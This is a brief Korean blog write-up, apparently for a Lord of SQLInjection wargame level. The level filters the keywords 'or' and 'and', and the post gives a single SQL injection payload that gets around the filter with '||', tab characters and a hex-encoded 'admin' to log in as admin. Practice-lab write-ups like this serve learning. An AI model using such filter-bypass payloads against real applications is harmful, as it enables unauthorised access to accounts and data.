728x90
id가 admin이면 풀리는데 guest로 고정되어 있다.
그리고 preg_match로 or과 and 연산자가 필터링 되어 있다..
or과 and 연산자를 우회할 수 있는 방법이 또 뭐가 있을까???
?pw=0%27%09||%09id=0x61646d696e%23
728x90
'Web > Wargame' 카테고리의 다른 글
[Lord of SQLInjection] wolfman (0) | 2021.09.23 |
---|---|
[Lord of SQLInjection] goblin (0) | 2021.09.22 |
[Lord of SQLInjection] cobolt (0) | 2021.09.22 |
[Lord of SQLInjection] gremlin (0) | 2021.09.22 |
[Lord of SQLInjection] orc (0) | 2021.09.22 |
댓글